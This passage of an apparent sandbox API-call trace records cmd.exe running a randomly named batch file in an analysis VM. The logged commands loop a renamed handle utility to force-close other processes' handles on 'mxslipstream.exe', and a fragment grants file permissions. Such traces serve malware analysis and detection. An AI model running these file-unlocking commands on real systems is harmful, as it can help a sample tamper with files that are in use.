_get_osfhandle (_FileHandle=1) returned 0x7 [0228.018] GetFileType (hFile=0x7) returned 0x2 [0228.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.018] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0228.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.019] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x17) returned 1 [0228.019] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef21c | out: _Buffer="\r\n") returned 2 [0228.019] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.019] GetFileType (hFile=0x7) returned 0x2 [0228.020] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.020] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1dc | out: lpMode=0x2ef1dc) returned 1 [0228.020] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.020] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef208, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef208*=0x2) returned 1 [0228.021] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0228.021] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0228.021] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0228.021] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0228.021] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0228.021] _wcsicmp (_String1="set", _String2="CD") returned 16 [0228.021] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0228.021] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0228.021] _wcsicmp (_String1="set", _String2="REN") returned 1 [0228.022] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0228.022] _wcsicmp (_String1="set", _String2="SET") returned 0 [0228.022] GetConsoleTitleW (in: lpConsoleTitle=0x2eed8c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.023] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0228.023] SetEnvironmentVariableW (lpName="FN", lpValue="\"mxslipstream.exe\"") returned 1 [0228.023] GetProcessHeap () returned 0x390000 [0228.023] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a81a8 | out: hHeap=0x390000) returned 1 [0228.023] GetEnvironmentStringsW () returned 0x3a6b50* [0228.023] GetProcessHeap () returned 0x390000 [0228.023] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb88) returned 0x3a76e0 [0228.023] FreeEnvironmentStringsW (penv=0x3a6b50) returned 1 [0228.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.024] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.024] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.024] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0228.025] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.025] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0228.025] SetConsoleInputExeNameW () returned 0x1 [0228.025] GetConsoleOutputCP () returned 0x1b5 [0228.025] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.025] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef1c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0228.026] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0228.026] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.027] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0228.027] GetProcessHeap () returned 0x390000 [0228.027] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4280 | out: hHeap=0x390000) returned 1 [0228.027] GetProcessHeap () returned 0x390000 [0228.027] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4240 | out: hHeap=0x390000) returned 1 [0228.027] GetProcessHeap () returned 0x390000 [0228.027] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4200 | out: hHeap=0x390000) returned 1 [0228.027] GetProcessHeap () returned 0x390000 [0228.027] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390db8 | out: hHeap=0x390000) returned 1 [0228.027] GetProcessHeap () returned 0x390000 [0228.027] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a41a0 | out: hHeap=0x390000) returned 1 [0228.027] GetProcessHeap () returned 0x390000 [0228.027] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x391258 | out: hHeap=0x390000) returned 1 [0228.027] GetProcessHeap () returned 0x390000 [0228.027] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3911d0 | out: hHeap=0x390000) returned 1 [0228.027] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.027] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0228.027] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2ef1a8*=0xa3, lpOverlapped=0x0) returned 1 [0228.028] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.028] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0228.028] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.028] GetFileType (hFile=0x78) returned 0x1 [0228.029] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.029] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.029] GetProcessHeap () returned 0x390000 [0228.029] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3b4bc8 [0228.029] GetProcessHeap () returned 0x390000 [0228.029] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x70) returned 0x3911d0 [0228.029] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x2ee938, lpFilePart=0x2ee930 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2ee930*="Ch81ANBE.bat") returned 0x32 [0228.029] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ee64c | out: lpFindFileData=0x2ee64c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x391248 [0228.029] FindClose (in: hFindFile=0x391248 | out: hFindFile=0x391248) returned 1 [0228.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ee64c | out: lpFindFileData=0x2ee64c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x391248 [0228.029] FindClose (in: hFindFile=0x391248 | out: hFindFile=0x391248) returned 1 [0228.030] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0228.030] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ee64c | out: lpFindFileData=0x2ee64c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x391248 [0228.030] FindClose (in: hFindFile=0x391248 | out: hFindFile=0x391248) returned 1 [0228.030] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x2ee64c | out: lpFindFileData=0x2ee64c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x391248 [0228.030] FindClose (in: hFindFile=0x391248 | out: hFindFile=0x391248) returned 1 [0228.030] GetProcessHeap () returned 0x390000 [0228.030] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x56) returned 0x391248 [0228.030] GetProcessHeap () returned 0x390000 [0228.030] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0228.032] _tell (_FileHandle=3) returned 78 [0228.032] _close (_FileHandle=3) returned 0 [0228.032] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eef7c | out: _Buffer="\r\n") returned 2 [0228.032] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.032] GetFileType (hFile=0x7) returned 0x2 [0228.032] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.032] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef3c | out: lpMode=0x2eef3c) returned 1 [0228.033] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.033] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eef68, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eef68*=0x2) returned 1 [0228.033] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0228.033] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.033] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eef78 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0228.033] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eef78 | out: _Buffer=">") returned 1 [0228.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.034] GetFileType (hFile=0x7) returned 0x2 [0228.034] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.034] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef40 | out: lpMode=0x2eef40) returned 1 [0228.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.034] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eef6c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eef6c*=0x26) returned 1 [0228.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.035] GetFileType (hFile=0x7) returned 0x2 [0228.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1c4 | out: lpMode=0x2ef1c4) returned 1 [0228.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.035] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x390dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef1f0, lpReserved=0x0 | out: lpBuffer=0x390dc0*, lpNumberOfCharsWritten=0x2ef1f0*=0x2) returned 1 [0228.036] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef1fc | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0228.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.036] GetFileType (hFile=0x7) returned 0x2 [0228.036] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0228.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.036] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x2d) returned 1 [0228.037] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef21c | out: _Buffer="\r\n") returned 2 [0228.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.037] GetFileType (hFile=0x7) returned 0x2 [0228.037] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.037] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1dc | out: lpMode=0x2ef1dc) returned 1 [0228.037] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.037] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef208, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef208*=0x2) returned 1 [0228.038] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0228.038] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0228.038] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0228.038] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0228.038] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0228.038] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0228.038] GetConsoleTitleW (in: lpConsoleTitle=0x2eed8c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0228.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.039] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0228.039] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2eeb48, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2eeb40, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2eeb40*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0228.039] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ee8e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.039] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x2ee8e4, lpFilePart=0x2ee8e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x2ee8e0*=0x0) returned 0x26 [0228.040] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0228.040] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ee660 | out: lpFindFileData=0x2ee660*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3a4480 [0228.040] FindClose (in: hFindFile=0x3a4480 | out: hFindFile=0x3a4480) returned 1 [0228.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ee660 | out: lpFindFileData=0x2ee660*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3a4480 [0228.040] FindClose (in: hFindFile=0x3a4480 | out: hFindFile=0x3a4480) returned 1 [0228.040] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0228.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ee660 | out: lpFindFileData=0x2ee660*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3a4480 [0228.040] FindClose (in: hFindFile=0x3a4480 | out: hFindFile=0x3a4480) returned 1 [0228.040] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0228.040] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0228.040] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0228.040] GetProcessHeap () returned 0x390000 [0228.040] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a76e0 | out: hHeap=0x390000) returned 1 [0228.040] GetEnvironmentStringsW () returned 0x3a6b50* [0228.041] GetProcessHeap () returned 0x390000 [0228.041] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb88) returned 0x3a76e0 [0228.041] FreeEnvironmentStringsW (penv=0x3a6b50) returned 1 [0228.041] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.041] GetProcessHeap () returned 0x390000 [0228.041] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4420 | out: hHeap=0x390000) returned 1 [0228.041] GetProcessHeap () returned 0x390000 [0228.041] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a43c0 | out: hHeap=0x390000) returned 1 [0228.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.041] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0228.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.041] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0228.042] _get_osfhandle (_FileHandle=0) returned 0x3 [0228.042] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0228.042] SetConsoleInputExeNameW () returned 0x1 [0228.042] GetConsoleOutputCP () returned 0x1b5 [0228.042] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0228.042] SetThreadUILanguage (LangId=0x0) returned 0x409 [0228.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef1c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0228.043] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0228.043] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.043] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.043] GetProcessHeap () returned 0x390000 [0228.043] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4350 | out: hHeap=0x390000) returned 1 [0228.043] GetProcessHeap () returned 0x390000 [0228.043] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a42e0 | out: hHeap=0x390000) returned 1 [0228.043] GetProcessHeap () returned 0x390000 [0228.043] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4270 | out: hHeap=0x390000) returned 1 [0228.043] GetProcessHeap () returned 0x390000 [0228.043] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4200 | out: hHeap=0x390000) returned 1 [0228.043] GetProcessHeap () returned 0x390000 [0228.044] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390db8 | out: hHeap=0x390000) returned 1 [0228.044] GetProcessHeap () returned 0x390000 [0228.044] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a41a0 | out: hHeap=0x390000) returned 1 [0228.044] GetProcessHeap () returned 0x390000 [0228.044] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x391248 | out: hHeap=0x390000) returned 1 [0228.044] GetProcessHeap () returned 0x390000 [0228.044] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3911d0 | out: hHeap=0x390000) returned 1 [0228.044] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.044] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0228.044] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2ef1a8*=0x94, lpOverlapped=0x0) returned 1 [0228.044] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0228.044] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.044] GetFileType (hFile=0x78) returned 0x1 [0228.044] _get_osfhandle (_FileHandle=3) returned 0x78 [0228.044] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0228.044] GetProcessHeap () returned 0x390000 [0228.044] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3b4bc8 [0228.045] GetProcessHeap () returned 0x390000 [0228.045] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x4008) returned 0x3b8be0 [0228.046] GetProcessHeap () returned 0x390000 [0228.046] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xe) returned 0x390db8 [0228.046] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"mxslipstream.exe\"") returned 0x12 [0228.046] GetProcessHeap () returned 0x390000 [0228.046] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390db8 | out: hHeap=0x390000) returned 1 [0228.046] GetProcessHeap () returned 0x390000 [0228.046] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b8be0 | out: hHeap=0x390000) returned 1 [0228.046] GetProcessHeap () returned 0x390000 [0228.046] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0228.053] _tell (_FileHandle=3) returned 226 [0228.053] _close (_FileHandle=3) returned 0 [0228.053] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eef7c | out: _Buffer="\r\n") returned 2 [0228.053] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.053] GetFileType (hFile=0x7) returned 0x2 [0228.054] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.054] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef3c | out: lpMode=0x2eef3c) returned 1 [0228.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.055] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eef68, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eef68*=0x2) returned 1 [0228.055] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0228.055] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0228.055] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eef78 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0228.055] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eef78 | out: _Buffer=">") returned 1 [0228.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.055] GetFileType (hFile=0x7) returned 0x2 [0228.056] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.056] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef40 | out: lpMode=0x2eef40) returned 1 [0228.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.056] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eef6c, lpReserved=0x0 | out: 